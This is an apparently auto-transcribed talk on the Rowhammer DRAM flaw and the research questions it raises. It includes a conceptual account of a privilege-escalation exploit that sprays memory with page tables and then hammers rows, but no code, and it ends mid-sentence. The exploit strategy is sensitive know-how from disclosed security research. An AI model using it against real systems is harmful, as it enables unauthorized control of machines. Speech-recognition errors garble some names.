 Does the microphone work? Test. Test. Test. Can we also have this one? Great. Well, thanks a lot. And it's impressive to see the growth of the Singapore InfoSec community. I've been here the first time, I think, in 2001 and have come back every few years after. And it's awesome to see something like these meetups here happening. So anyhow, my talk tonight. And thanks for showing up is called Three Things that Rohammer Taught Me. And what this means for security research, at least for areas that I find really interesting. So first off, who am I? I've started reverse engineering in 1997. So I recently realized that it's been almost 18 years. I wrote my first exploit in 1999. And then I was very much hooked on vulnerability development and didn't do all that much else for the next couple of years. I ended up starting a company called Dynamics in 2004. Funnily enough, with money I'd earned in Singapore by training people here. So Singapore always has a very important place in my life when it comes to fundraising. So we wrote a bunch of different tools for reverse engineers. Bindi for patch analysis, much to the chagrin of Microsoft at the time, who really wasn't very amused. Binnavi, a UI for reverse engineering, and VxTask, which was used for malware analysis. And we ended up being acquired by Google in 2011, much to our surprise, because we would have never thought anybody would be crazy enough to acquire us. I worked at Google for the next four and a half years trying to help defend Google, which has clearly a very large and complicated infrastructure, and worked a lot on large-scale malware analysis. And working at Google very much really find my perspective of scale. Because Google's way of doing computing is very different from the way everybody else thinks about computing. While it was a stressful experience, it was a very, very intellectually-enriching experience. I'm a mathematician by trade, which means I actually quite like theory. But what I like most is the border of where theory meets practical stuff. So there's a lot of people in the hacker community that are a little bit averse to theory. There's a lot of people in the academic community that are overly averse to practice. I really like the boundary between the two. And right now, I'm currently on a sabbatical four-year, and my wife and me are traveling the world reading and surfing and pretty much enjoying life. Now, after talking about me, what is Rohemma? Rohemma was a fairly important security issue last year, or is a fairly important security issue last year, because Rohemma is a fault in most DRAM chips. And essentially all DDR3 non-ECC DRAM chips, where repeated activation of a memory row can cause bit flips in memory. And pretty much all major RAM vendors have the problem of their RAM being affected. And pretty much any RAM you've bought since 2010, if it's DDR3 and non-ECC, has Rohemma issues. So a whole generation of hardware is affected, and it's a hardware flaw that is not patchable in the traditional sense. That's why it's not what was Rohemma, but what is Rohemma? Yeah. Are PCs written by a student? Yeah, there were many interesting things about Rohemma. It started out with the effect was actually known in the chip making community since 2011 or 12-ish. And then in 2014, a student published a paper where he actually managed to reproduce it using specialized hardware setups. So he bought RAM. They had a specialized hardware setup where they could measure whether the flaw was present. And their hardware setup implied that it is much more prevalent than people thought. But nobody could reproduce it on actual delivered machines. And then what we ended up doing is we actually, well, I'll get into this, we actually managed to reproduce it on laptops and cause security issues through this. So what is Rohemma? A short piece about my background. I have no idea about physics or electrical engineering. My physics knowledge, it's eighth grade high school, essentially. So for me, all of this was very new. But in short, if you look at Rohemma, it seems that the consensus is that the issue is the following. If you imagine DRAM, you have to imagine DRAM as a lot of crossing wires arranged in the grid and everywhere with these wires intersect on this diagram, you have a small capacitor that stores a charge and that charge means there's a one bit or a zero bit stored in memory. And when you try to read out a piece of memory, what you do is you apply a current to one of these horizontal wires and that current then makes the semiconductors underneath it conduct. So the charge from this capacitor can flow out and then you can read out the memory at the bottom. And literally this is how DRAM works. You've got this big matrix of bits and then you activate one row. Applying the current is called row activation. And then you read out that one row and then you know what's in that row. The row has a certain number of bits. And then you need to write the values back to the row as well. You need to refresh the row because you've just drained the charge from it. And that's the theory. So the trouble is that over time DRAM became denser and denser and there was a standard that said refresh the DRAM every 50 milliseconds. So at regular intervals because these capacitors lose some charge, the memory controller would go to memory and would start refreshing every single row. So the DRAM got tighter and tighter and the memory controller got faster and faster at talking to the DRAM. What hadn't changed really was the refresh interval between times that things have to be refreshed. And as memory gets closer and closer together, what happened is when you applied the current to the middle row, a little bit of charge would leak to the neighboring lines. And this little bit of charge that would leak to the neighboring lines would lead to a little bit of activation of the semi-conductors on the neighboring rows and then a little bit of charge flowing away. So if you were activating a row repeatedly, hammering that row and if you're doing that very aggressively as fast as the CPU can possibly do it, then you could make the memory start forgetting bits. And it was a probabilistic effect and would only happen in certain parts of DRAM. So what you would need to do is you would literally sweep through memory, hammering at different intervals, seeing whether occasionally a bit would flip. And that's pretty nasty because all of our computing architecture, all of our operating systems, everything goes out the window. All security guarantees, all security boundaries go out of the window as soon as you get bits to flip. Now the DRAM community or the electrical engineering community knew that row hammering could happen, but they only perceived it as a reliability issue. So they were like, hey, as long as nobody intentionally tries to really cause this, then there's no issue and we don't need to worry too much about it. Amusingly enough, the electrical engineering community became aware of this because somebody wrote regular code that accidentally triggered this. So some of the RAM was really, really quite bad and then only when in the field bits started randomly flipping, people were figuring out that this is an actual problem. So row hammer was deemed non-exploitable and only a reliability issue. And then Mark Seaborn and me, we were both at Google at the time, started looking into this. Mark had managed to reproduce the bit flips on a laptop. A lot of people didn't want to believe that this is actually reproducible on a regular laptop. So Mark and me went to one of the storage places at Google. You can essentially ask for hardware there. Like when you lose your laptop, you can ask for a laptop, a new corporate laptop and so forth. So what we did is we essentially got all the laptops they had and started testing them. And that day, three of the laptops or four of the 10 laptops that we had checked out started flipping bits. And then as soon as you have a patient zero, we call them flippy the laptop. It was the first laptop to exhibit these flips. You can start optimizing your code because now you've got something to work with. And we got very, very good at causing bit flips. Essentially, more or less all of our thinkpads were affected and large parts of the rest of the fleet. And we ended up finding a way to abuse random bit flips to cause privilege escalation on x86 systems. And the underlying idea works pretty much for any operating system, any of the major operating systems, meaning Linux, Windows and OS X. But we only implement the Linux variant. Now, a question is, sorry, a valid question is, how would you exploit a random bit flip? And for this, we have to go a little bit back to our operating systems manual. And remember, there's something called page tables. And page tables are responsible for translating virtual addresses to physical addresses in actual memory. And they're also responsible for storing access permissions, like which process can access which memory page. And a page table consists of a bunch of entries called page table entries, surprisingly. And they're 64 bits long and have roughly this layout. Now, we can pretty much ignore everything in this layout. Our question is rather, let's assume we could fill all of memory with page table entries and then a random bit would flip. What is the probability of this random bit flip being useful? So we examine this data structure and there's two places where random bit flips are going to be very useful. For one, there's the privilege bit. The privilege bit is naturally useful, but it's only one bit out of 64. So that's a very, very crappy rate of success because you would need to hit the right bit out of 64. But then we've got this thing here, the physical page base address. So the physical page base address essentially says the virtual address that you're accessing here maps to this physical page in RAM. If you have a bit flip in this, anywhere in this physical page base address, then out of the sudden, your virtual address will map to a different page in RAM that you shouldn't have access to. So as soon as you get read write access to memory that you shouldn't be having access to, you're on your way to have a privilege escalation. And at 30% success chance, that's fairly good odds. So the strategy of the exploit was more or less we spray all of physical memory with page tables. And the way to do this is we created a memory map file. A memory map file is a file on disk that is backed by some physical pages that when they are modified, the operating system will take care of synchronization with the file. And we map the same file over and over again. You can map the same file over and over again, which means the physical pages for that file will only be in physical memory once. But then you map it over and over again, which means the operating system needs to allocate space for it over and over again, which means it needs page table entries, which means you can fill all of physical memory with page table entries except for the file. So literally you only have the file, a little bit of your operating system, and then all of your physical memory is page table entries. And at that point, if you flip a bit, you have a 30% chance of hitting something that is useful, and you will get read write access to another random physical memory page. This other random physical memory page, though, will contain page tables because all of physical memory is full of page tables. And now you've got read write access to page tables, which means you can map anything, anywhere, get read write to all of physical memory of the system, and you're done. If it's not intuitive yet, we can have a diagram explaining this in the appendix of this. Anyhow, so the beauty of this is that this trick means you can go and exploit a completely random bit flip. So we don't even need to know anything about where this bit flip occurs. If you just fill all of memory with page table entries, and a cosmic ray hits your computer suddenly, or, I don't know, you have a spontaneous deterioration of a radioactive element that somebody put into your RAM, and a bit flips, then you still have a 30% chance of the attacker actually getting control. It's a surprisingly good odds for something that is inherently super random. Yeah, so what did they actually exploit, too? So it filled all of physical memory. It then started hammering memory for a while to see whether it was causing bit flips. It then scanned through the memory it had mapped to see whether any of it was out of order now, or pointing to places where it was unusual. And then if it found out that one of the memory mappings had become unusual, it would identify, well, where is it mapping? And then abuse it. Talk about, well, I would say, eight to 12 weeks of work to get this going. Realistically, the technical part was the smallest thing. The political nightmare that ensued thereafter when we tried to tell people, hey, most of your RAM is broken, took many months and was very unpleasant. So, Rohammer was quite important for me because I thought I knew quite a bit about security, and Rohammer carried a number of lessons that quite fundamentally changed the way I think about computing and I think about security. And in a way, Rohammer may have been a very interesting trick, but the implications of Rohammer are the really interesting thing. And what I actually want to talk about today is not Rohammer itself, but the implications from Rohammer for security and security research. So, the first lesson and the lesson that we all need to always keep in mind is one bit flip is enough. If the attacker does not need 100% reliability, one flipping bit for most computing systems will mean complete failure of all security mechanisms. One of the biggest problems with Rohammer was that most of the industry before Mark and me started working on this assumed that a bit flip would not, like a random bit flip would not be exploitable. I have to give a lot of credit to my then boss at Google, Eric Gross, that said, well, if you can flip a bit, I believe you immediately, you can turn this into an exploit. He understands how exploitation works quite well, but most of our industry is still quite skeptical about how much is required to get an exploit. And the important thing to always keep in mind is a single bit flip is enough. We're not the first ones, turns out, to exploit single bit flips. There's a 2003 paper called Using Memory Errors to Attack a Virtual Machine where the authors managed to break out of a Java VM by causing random bit flips in memory and in order to simulate those random bit flips they didn't have Rohammer, they actually strapped a heat lamp to a desktop machine, to the RAM to heat it up beyond the specified heat to make it less reliable. So we have a pattern where over a period of 12 years, the lessons of a single bit flip is enough, gets forgotten, and then rediscovered again and we just need to stop forgetting that lesson because a single bit flip will be enough. The other really, really important lesson is deterministic computing is the abstraction we all think about. It's the abstraction we all think in and the abstraction we're taught. It's a good abstraction, but in the end, prem, physics rules, everything around me, you can't... The computers are not actually deterministic at all times. We think about them as deterministic machines but they are probabilistically deterministic, meaning they're deterministic most of the time. And the way they're engineered is that the probability of non-determinism, of random non-determinism is made very, very low in practice, but they're not engineered to be... to have the probability of non-determinism be low against malicious input, meaning in the average case of somebody not using the computer maliciously, they will not exhibit non-deterministic behavior, but the engineering trade-offs and the engineering processes are not optimized against a malicious attacker. So it's like your car. On average, your car will not exhibit a failure when you drive it down the speedway, but if you've got a malicious driver that tries intentionally to damage the car, then the odds of failure of that car are much, much higher. That's something that all the hardware engineers know, but none of the software engineers seem to realize, and then because security and hardware people don't always talk to each other, doesn't really enter the picture. So there's millions of examples for this. If you look at flash and ware-leveling in flash, so we all know that flash doesn't allow an arbitrary number of reads, sorry, writes to it. So what happens is all the flash drives and so forth, they have ware-leveling, all over the memory stick. Now, if you knew the ware-leveling algorithm and you were trying to pick your input to writing maliciously so that the same memory cell gets hit all the time, you could probably wear out a USB stick pretty damn quickly. And when you wear out a USB stick, this probably means that you can get bits to flip on the USB stick or on the flash drive. So if there's any data that is trusted on that flash drive by some other component of the system that has privileges, you can flip a bit, a single bit flip is enough. So we have most likely issues like this when it comes to flash and other hardware components. If you look at the way that CPUs are made, I mean, CPUs are made on these big wafers, and then there's hardware imperfections, there's silicon imperfections, there's just process variations, and then the CPU manufacturers go through every single CPU and they test how fast can we clock the CPU without it starting to fail. And then they bin it depending on these tests, and then they sell them at different prices. But this also means that, well, the hardware vendors are incentivized to sell chips just at the boundary of them working reliably. Like any chip that they're not selling because they're too prudent cuts into the profit margins significantly. All the RAM vendors, why did they sell bad RAM? Because it was too expensive for them to discard RAM that can't be made to fail. So we have economic incentives that drastically work against secure systems and that's super interesting for us. And the cloud computing, or the move to cloud computing changes the risk calculus of all of this. In the past, you were like, well, so what if there's a thousand, like one in a thousand CPUs has an issue? I'm not going to be able to attack somebody just because one of a thousand CPUs has an issue. In cloud computing, I can go to Amazon and rent 5,000 CPUs, and one of them will have the issue. And Amazon needs to defend in spite of the risk of one in thousand CPUs not actually implementing the spec that it should be implementing. So as an attacker, you can play a very low probability game over and over again. And any low probability game that you can play arbitrarily often, you asymptotically win. So deterministic computing is an abstraction and that's a very bizarre lesson to learn. You talk to any hardware engineer and he laughs and he's like, oh, I always knew this. But turns out that as a computer science or math person, you don't really know it or not in a very intuitive sense. The third lesson and another very important lesson is that the idea of impenetrable defense is not a very useful concept in the sense that your chip may have a secure enclave but you don't know whether this chip actually implements the specification all of the time. The odds of some chip failing non-deterministically and then having a security issue even though everything else has been formally verified is real. And if you look at the previous point with non-deterministic computing, if you realize that computers are only average case deterministic, that means that the entire concept of secure enclaves that nobody can look into may be a doomed and very harmful concept. If you look at the secure enclaves these days, there's a big impetus towards trust zone or into SGX or into management engine or whatever. Small, very easily or not easily but very small components that are completely opaque to the outsider that are supposed to be the roots of trust and provide security for everybody. The trouble is that even if you formally verify all the code running in the secure enclave, the secure enclave or the formal verification will go against a specification of semantics of what the CPU should be doing but the CPU will only adhere to the semantics 99 with some percentage of the time and the small windows where the CPU may not adhere to the semantics may be enough for the attacker to exploit it. And this is dangerous because the secure enclaves are engineered so that nobody can look inside them and if you realize that you cannot reliably defend, if you cannot reliably keep the attacker out but you force a component that is non-inspectable into every machine that means you will get attackers that get into the machine and you'll never be able to get them out again or even tell that they are there. And this problem of us building more opacity into already overly opaque systems that's a significant problem. Actually, I like to call this Schrodinger's hack as the current computing infrastructure stands if somebody gives you a device nobody on earth can tell you whether this device is currently compromised or not and that's insane. It's really insane because if I give you a car you know you're now in control of that car. Well, not anymore with chips but if I give you an analog car like a Lada from the 80s and you have that car then you know you're in control of that car whereas this is no longer the case So, we've got these three lessons from Rohammer and all of these three lessons from Rohammer highlight a different and interesting area of research in different and interesting areas of computer science, electrical engineering and software engineering and I'd like to talk about those. So, and interestingly the three research areas that Rohammer highlighted for me are spread out very evenly over different areas of computer science. There's one research area in theoretical computer science that we really need to look at. There's a very interesting border between electrical engineering, statistics, physics and computer science that we need to look at and then there's really interesting systems engineering that needs to be done and I'll talk about the three now. So, the first research area that we need to look into and that's the theoretical computer science research area is we really need in computer science a proper theory of exploitation. Right now, the theoretical understanding of exploitation is weak nobody can even provide a proper definition of what exploitation means and that's a problem because misjudgment by seasoned practitioners about whether something constitutes a security vulnerability or not is very, very common and when big hardware vendors make the mistake of discounting Rohammer as a reliability issue that means that there's a problem where we're lacking the fundamental theorems like something like the halting problem in other areas of computer science. So, we have no good theoretical framework in theoretical computer science to analyze what issues are exploitable or what issues are not exploitable where the boundary between two lines what makes one issue non-exploitable what makes the other issue exploitable or what facilitates exploitability and we get a lot of really negative consequences from this meaning misjudgment made by management about risk bad mitigations, mitigations that don't actually stop the attacker but carry a cost for the consumer being implemented and so forth. So, my suggestion on how to tackle building such a theory would be that you assume a tiny toy CPU and I intentionally try to stay away from the truing machine abstraction because it's cumbersome in that particular situation. So, you assume a small CPU with a finite array of memory cells, a few registers and more or less six instructions a peak, a poke, meaning read and write from memory an additional operation, a conditional branch and receive and send which sends a value out of the system or receives a value into the system and this is the CPU that you're looking at theoretically and then the programmer that writes an application has a finite state automaton that represents an application and emulates this finite state automaton on that CPU that's what's happening nowadays. If I write a mail server there's a bunch of states of a mail server that are valid so I write a C program that emulates these states and unfortunately there's extra states so my system is exploitable. So, here in the theoretical view the programmer emulates the finite state machine on the toy CPU and the attacker gets to choose an arbitrary valid state of this emulated state machine in the toy CPU and then the question is if a random bit would flip now what is the probability of the attacker being able to reach any possible state of the toy CPU? So, what I'm trying to get at with this direction here is you've got the finite state machine the finite state machine has state transitions between those states but once you flip a bit a state is entered that should never be there but the attacker, by keeping on sending data can still execute the transitions on a nonsensical state and by executing the transitions on a nonsensical state into an even more nonsensical state and so forth and my intuition, my suspicion is that if the state machine is non-trivial meaning it contains a linked list then a single bit flip is probably enough for an attacker to reach any possible state of the toy CPU and that's, this is not proven right this is just my suggestion on if you were to try to build a proper theory of exploitation where you should start where I will start if I ever get time for it anyhow, so if we had a proper theory of exploitation it would give us many, many useful things first of all we could start distinguishing useful from non-useful mitigations because I have spent a lot of time in my life kicking stupid ideas for mitigations to death because people come up with this idea oh, if we just do my idea then exploits won't be a problem anymore and they've never written an exploit first of all we would be able to identify bad ideas we would help understand what level of complexity makes the system exploitable and how simple do we have to make a system for it to be not exploitable and it would finally put exploitation on to sound footing in academia because in a way it is magic it is obscurity and magic and the lack of formality and the lack of proper understanding of it then leads to problems in very strange areas it leads to problems, for example, in policy circles where traffic and exploitation or if traffic and exploits are being regulated with weapons controls legislation just because it looks like magic it's not magic, it's computer science it's just badly formed computer science in the sense that we haven't actually quite understood it yet anyhow, so the first research area highlighted by Raul Hammer somebody needs to go and write a proper theory of exploitation the second big research area that Raul Hammer highlighted for me is we need good research on worst case analysis of ICs of integrated circuits of chips we need to have analysis into the degradation wear and tear of chips over time because we treat chips as if they're a solid state but they're not actually a solid stage if you're mean to a chip for long enough individual atoms will dislodge and accumulate elsewhere on the chip and actually affect switching speed and by this affect the behavior of the chip we need ways of understanding how do you need to treat a chip to achieve non-determinism how can you abuse the chip enough to achieve non-determinism because with cloud computing JIT code everywhere, sandboxing and so forth the instruction stream of the CPU needs to be treated as malicious input if you run a cloud infrastructure your attacker can run code on your CPU when people designed integrated circuits they never imagined that the attack model against a chip would be the code running on the chip so the way that CPUs are being built currently you have the wafer manufacturing process over many, many weeks I think the length of a production cycle for a wafer of chips is something like 10-12 weeks now and at the end they just measure the chips and discard those that are not working and then keep those that are working and build them depending on their performance characteristics and then sell them off but the IC manufacturers optimize for maximum yield without random failure so they don't want their customers to complain about the chip randomly doing the wrong thing but their incentive model does not take into account malicious person trying to cause maximum harm on the chip so the research area is finding malicious ways of executing code on the chip doing things that do maximum harm to the chip and violate the assumptions of the design in the worst possible way the electrical engineering community does a lot of really interesting research on speed and voltage binning and on testing of their chips there's billions of dollars on that topic for reliability so they have a lot of fantastic research on it it's just that nobody outside of the community reads it and understands it so basically we need to go and read a lot of that stuff and we need security research then on identifying something called critical speed path in silicon and identifying critical areas for crosstalk in silicon crosstalk is this effect when you activate one line and out of a sudden some charge leaks over to the neighboring lines and weird stuff happens so these are things you can't really do from the specification like from the VLSI you probably need to look at the chip itself and the way the chip is laid out and the distances between individual gates on the chip and then start reasoning about how that works and after you've identified the sketchy parts of the chip you need to go back and try to figure out how can we send input into the chip that causes these faults can the critical path be made more critical by intentionally causing some transistor degradation can I rent a computer and make it do something bizarre for a year and then the CPU will be worn out in a particular part and then I can cause crosstalk elsewhere on the CPU nobody can answer these questions right now and that's a pity it may end up being economical if you're trying to attack a cloud provider and everybody keeps their useful data with a cloud maybe economical to rent a thousand CPUs on Amazon for a year or on Google or wherever and just try to cause one of the CPUs to degrade enough in that year to become useful for you it looks like an extremely fruitful area of research because the IC manufacturers are in a very tough spot the margins for most integrated circuits are not very big Intel has healthy margins but everybody else is not making much money they can't afford to test a single chip for very long like the chip comes from the production line needs to be tested and then needs to be shipped they can't run like a three months burn-in on the chip to see whether it will perform well in all situations so the attacker can profit from a very small fraction of CPUs that may come out of this that are faulty and even if those faults only occur once a month like even if I have one in thousand CPUs with a flaw that manifests itself once a month that is still going to be useful for me as an attacker and that's really exciting and the other thing is that the chip manufacturers cannot be arbitrarily careful because it directly cuts into the profit margins and money is at stake so their business model more or less depends on them not being overly careful and it's going to be interesting research because you'll need the collaboration between security people and between people that actually know not only VLSI design but know about the manufacturing process know about the variations in chips induced by the manufacturing process and that know about yield optimization I think the biggest problem is actually getting somebody that knows this to collaborate with you because most of them have signed an NDA at some point in life and are not allowed to collaborate with you and that sort of research may also require a budget because hardware investigation is expensive building a chip fab is now at like three or four billion so even simple, like inspecting simple things is going to be expensive I would love to investigate this but I have no idea of electrical engineering and I would need a collaborator that is very very patient another thing that I expect to happen the semiconductor industry is not going to be a fan of you if you do this they will very aggressively lobby against this stuff ever reaching the public I think they were very unhappy about Rohammer to even become public and they would have liked to do that thing just never hitting the light of the day it's an incredibly competitive and secretive industry and there's the famous former Intel chairman that coined the motto only the paranoid survive and the entire industry lives by that motto I was very impressed by their rigor so doing this will involve picking a fight the third big research area that Rohammer highlighted for me is the problem of building inspectable systems and I think that only through inspectability we will reach defendability what do I mean with this in the real world you've got the concept of ownership and possession meaning I can legally own a car and I can be in possession of the car if I rent a car the rental car company is legally owner of the car but I am in possession because I currently have the car and have control over it now IT systems have a third dimension and that third dimension is underappreciated that is control I can have both ownership and possession of a computing device without being in control of it if you look at a cell phone or an iPhone for now if it has an auto update functionality I am the thing I am in possession of the thing yet somebody else can at an arbitrary point do whatever he wants with it so I am not actually in control of that device and the trouble is that we've built all our computing infrastructure in a way that is impossible to determine who is currently in control of that system nobody in the world that's what I meant with Schrodinger's Hack earlier can tell you whether a particular device is hacked or not you can make reasonable guesses like I don't see anything suspicious here but you don't actually know and there is no way to establish it with any certainty or any reasonable certainty so in today's systems it's impossible to establish who is in control and you've got hardware enclaves that are making their way into every piece of hardware now that try to prevent the loss of control but we know now that this can never be 100% because physics rules everything around me so at some point the enclave will fail and then I may have a device that will never be able to establish whether I'm still in control of it so if we actually want defendable systems we need to build systems where it's possible for the person that has possession of the device to establish who is in control of the device I need to be able to say now I can do something to the device in my hand that afterwards I know it's not hacked we try to approximate this by reinstalling operating systems and re-imaging but we all know it's a lie there's biases, there's chips, there's firmware chips like making belief or we're trying to get rid of something when we know that if the attacker actually wants to stay he will stay so what this means is we need to engineer systems from the ground up that any piece of code in the system can be checksummed and the infrastructure for checksumming the code needs to be non-updatable and temper evident meaning there must be no way to disable or update the checksumming mechanism without it becoming evident to the user and that goes against the prevailing trend in most systems where they are trying to make everything updatable and put a chip into other things I read an article about a year or two years ago about a guy running linux on his hard disk not like installing linux on a hard disk but running linux on the embedded controller that controlled his hard disk we get chips and chips and chips like every device now is a network of different computers every computer is a network of networks of computers all of them with updatable code and nobody knows where what is running and where it's from and that's just an untenable situation so we need to engineer systems that every place in the system that contains code, that can contain code can be inspected and we need to build a public ledger very similar to the certificate transparency ledger that Google has built but perhaps with a working gossip protocol or similar to Bitcoin something, a public infrastructure where all code signatures can be stored if Microsoft signs an update that update needs to be placed in the public ledger because otherwise their signing keys will get stolen or the FBI or somebody else will coerce them to hand over the signing keys and then malicious code can be signed and everybody can be hacked and there's no way to ever diagnose that this is happening so there needs to be a public ledger where all code signatures and every piece of code that is signed and trusted is stored interestingly the last bit is not research, that's just engineering but just engineering still means that somebody has to do it the first two areas are more and more interesting because that involves both software and hardware design and in a way that it's interesting because it's going to be product design and hardware design and usability design and all these things so we need to get rid of the current trend in trying to add more opacity to the systems because the added opacity that we're adding more opacity is wrong we already can't tell whether something is hacked adding more small black boxes in the system is a bad idea in a world where all signing keys can be stolen or coerced we need a public infrastructure to monitor code signatures and we need to have the possibility of establishing the origin to all code running on a machine if we can't do that then we may as well go home because right now if we can't establish who's in control of a machine all discussions about security are being in something called scholasticism that was something that happened in medieval times in Europe where because they didn't have the scientific principle the monks of the time started arguing now if we had a needle here how many angels could dance on its pin and because there was no way of ever verifying any of it everybody could write a lot of it and everybody could have a great career as a scholar without any progress whatsoever and we risk running the same thing in security because we are all arguing about something that is fundamentally unknowable at the moment right so summary Rohemer is interesting but the implications of it are much more interesting than Rohemer Rohemer is a symptom of much bigger issues at play computer security it's funny because when I started doing this in 1999 I was convinced this is not a worthwhile career this is going to be over in four or five years yeah it's not going to be gone anytime soon and it seems that the problems get more intricate and more bizarre because the technological growth curve and the speed of digitization is still much higher than our progress in understanding systems we're building systems and digitizing the world at a much faster rate than we can protect it so the problem is only getting worse and the problems are getting more interesting the collaboration between disciplines gets more and more critical all of these things that I discussed require security to work with electrical engineering or security to work with theoretical computer science or security to work with the product design people computer security is like seems to be like a lens where all areas of computer science focus like they all get focused into one point if any of the areas fails then security fails and that's interesting in itself anyhow if you find any of this interesting and want to talk to me about this or with me about this send me an email to thomas.dolinajima.com I'm currently traveling and hence my internet is not always that great and I'm specifically if anybody has expertise in VLSI chip design yield optimization or any of this and can enlighten me on any of that I'm extremely keen to get to meet you if not I'm still keen to hear from you any questions yes so the response from the industry was we've known about this and please don't talk about this and sorry de facto I was being a little bit mean previously so the response was we know about this it is no longer a problem in the next generation of chips and we didn't realize it was a security issue and yeah there is I'm unfortunately not in the situation to discuss the politics of it in much detail because I was employed and under NDA and all of this is kind of kind of complicated by and large a lot of the hardware manufacturers were clearly not very happy that this goes out at all a lot of them were of the opinion that if it's unpatchable then it shouldn't be talked about which is a cultural thing there's just a difference in culture between the computer security folks and the hardware folks also at the beginning of computer security and software people were arguing that such things should never be discussed at all so I think hardware just hasn't dealt with these security issues in the same way that our community has for server side ECC mitigates a lot of the problems it turns the privilege escalation issue into a denial of service issue essentially because the random bit flip will only cause the ECC to complain and the odds of getting three random bit flips that you need to bypass most ECC schemes are very very low so ECC is not a problem for mobile devices there's a new RAM standard that's called LPDDR low power DDR that has mitigations for this embedded the OEMs for laptops most of them reacted by rolling out BIOS updates that doubled the refresh rate of RAM which then refreshes the RAM not every 50 milliseconds but every 25 milliseconds which has negative effects for both performance and battery life so by and large the hardware industry knows about this but nobody was happy to hear about it and there were very weird from what I could tell the dynamics in the hardware industry were very weird because some people had heard about it some had tried to mitigate it some hadn't heard about it and the culture that software had where unify everybody that has a particular bug and then there's a task force to make sure that's all fixed that sort of cooperation wasn't quite there and I think they've built it by now I guess I think that the software industry has a bit more experience with dealing flaws because we tend to ship more flawed products so initially you showed a particular percentage of probability 30% I think in initial slides 30% is something where you're saying that you have a kind of assessment of assumption that this is the level of probability of being using this particular exploit like 30% so assuming a perfectly random bit flip then the probability was about 30% for the privilege escalation because about 30% of the page table entry are fields that are useful like if you get a bit flip in any of them then it's going to be useful in practice the reliability was much higher because what happened in practice is that when a bit flips in RAM it will always flip at the same point so because it's a hardware impurity or hardware issue if you get a bit in RAM to flip once you can get it to flip again so what the exploit would do it would search through RAM until it found a bit that was in the right place like it found a flipping bit that was aligned in a way that would be useful and then we made sure that the memory that that bit is on was reused for page table entries thereafter and we essentially when the machine had bit flips we achieved a reliability of 100% more or less there was no limit because if every bit flip you get the one third chance of being useful and if in a machine you get like if you search through it and you find more than 5 or 6 bit flips you will get one that is useful if that makes any sense One additional question I think you presented quite good scenarios but has there been any kind of a study or analysis to kind of put this exploit along with Kata where we signed the infrastructures which is much more more in fact than the public he sort of laps off and all the devices So it is possible that Skata systems are less effective than regular systems because they are old because the time window of this was the DDR3 RAM generation it was a time window of about 3 years and if you run a Skata system or if you run any system without ECC at the time that the RAM was manufactured and delivered then you may have that problem if you are running it with ECC RAM then you may not have that problem I do not know what percentage of Skata systems run ECC and I do not know what percentage of Skata systems were delivered in that time frame because if the memory is too old then it is not a problem because the wires weren't close enough together and if the memory isn't really new then the specifications DDR4 included will have fixed the issue there is also another funny area the only reason why this didn't turn into a universal jaybreak for all mobile phones is because the ARM memory controller seems to be much slower than the Intel memory controller so you can't hammer quickly enough on an ARM CPU at least as far as we know so mobile phones seem to have been very heavily affected by bad RAM because it seems what happens is when the RAM vendors can't sell the RAM to the server people or to the desktop people or laptop people then they sell them to the mobile phone people in general the level of reliability people expect from the mobile phone is less than the level of reliability people expect from the laptop that's just a reality yes you seem to play a lot of things in academia so I'd really like to know your rationale as far as I know universities I'm talking about quite recent top university I won't mention you I have this syllabus on security and the professor never hands on in their life so what's zero day maybe zero point one day and I'm not going to name all that and security is such that it is really real time what happened today and tomorrow somebody will do something and the scenario can be a landscape change so yellow pages and no hands on and the other thing is you mentioned about the curing machine that seem to be a God in academia who I speak now called the curing machine the most and blah blah blah you're going on very very and the ancient ACF actually no about subject matters and it's something that academia worships and if you go read all the papers in security whether I took a transaction ACM or one of those things nothing is real so how can they explain and talk about exploit because exploit is a real tiny thing and all of this is not updated I'm talking even up to PhD so I like to hear your faith in academia so my faith in academia is roughly the same faith I have in industry now the 90-10 rule applies everywhere the 10% of the people do good work 90% of the work being done is bad and that applies uniformly it seems across all human endeavors I agree that in security we have an added challenge the field is very young we're grappling with a lot of things that we don't understand and it's changing all the time I was very lucky in the sense that the 18 years that I've been doing or 19 years that I've been doing this I was there when the field was born after its birth and I could watch it grow but it's I think it's a problem for both industry and academia that the field is growing so much faster than we can teach in the sense that you go to a big conference now and because the field has doubled in size essentially every year over the last couple of years most of those people have very little experience and have forgotten a lot of the lessons what happened to me is at the research prize in Germany I went I've seen situations where the committee awarding a research prize they had all joined security in the last 6-7 years and then they awarded research prize for something that was more or less redoing a 10 year old result again in bad but they hadn't seen the 10 year old result because they had joined security thereafter and then so it can be very infuriating because we've been a practitioner for a long time a nice example is return-oriented programming where the security, like the practitioner's community had been doing this for many many years and it was practically known it was folklore knowledge that was known in the community and nobody deemed to be particularly interesting and then there's academics that have built their entire careers on variations of return-oriented programming when it became an academic thing and that's of course for those people that have been doing this for ages it's very infuriating and once sent me a paper that he wanted to publish prior to his PhD on return-oriented programming before it became a thing and I told him listen that's not really interesting why would you publish this and then somebody else has a big academic career based on this but the fault there is also with our community in the sense that we have a big security community that has folklore knowledge there's a lot of unwritten understanding of things for example the one bit flip is enough everybody that does a lot of offence knows that one bit flip is often enough but it's not that this is written anywhere and if it's not written it can't be taught so I don't have particular faith in academia nor in industry but I know that if we don't write the stuff we learn down and structure it properly and then teach it well then we won't be able to solve the issues because that stuff is like the demand for people understanding it is so high that we can't teach them fast enough did that answer your question? it's interesting to hear your faith realistically as a human if you look bluntly at humanity you only have two choices you believe in our demise or you believe in our survival and I believe in our long-term demise and our short-term survival and I'll try to do my best on the short-term survival any other questions? yes I'm actually writing a very interesting problem of formally describing what is the next point so I've never thought about this before to be honest so it's kind of a very interesting problem and from my perspective I have a feeling that if it's basically if you try to solve this it's going back to the roots and trying to formally describe what is good and evil in technology what's your thoughts about it how would you step into this area? so I've been thinking about this for a while down properly at some point hopefully this year you're right in the sense that you need to define good and bad and in our situation what we need to do is I mentioned that the programmer defines a state machine that he gets to emulate it on the toy CPU so if you think about computer programming now the programmer has when he writes a program he has an intent he wants to build a particular piece of software and this intended software that doesn't is not exploitable that is the thing that he wants to achieve and then he writes that software and while writing that software he makes mistakes so you end up having an implementation that is almost the machine that he wanted to build but not quite because there's a few states that are reachable that shouldn't be reachable in the his definition of a good machine that's the bug but then the exploit is a good machine I may actually need the whiteboard for this sure so let's say we have a state machine and we've got these transitions between states right and the designer of the software he has a state machine in his head when he designs the software and then he tries to implement that state machine and he implements that state machine by writing code to actually perform these these operations here there are many lines of code most of the time when you're writing code you're trying to get the state machine in your head from one state to the other now the trouble is when you accidentally create a new state because of bit flips or because you've made a mistake all these transitions here are still available so now you have what I call a weird state and 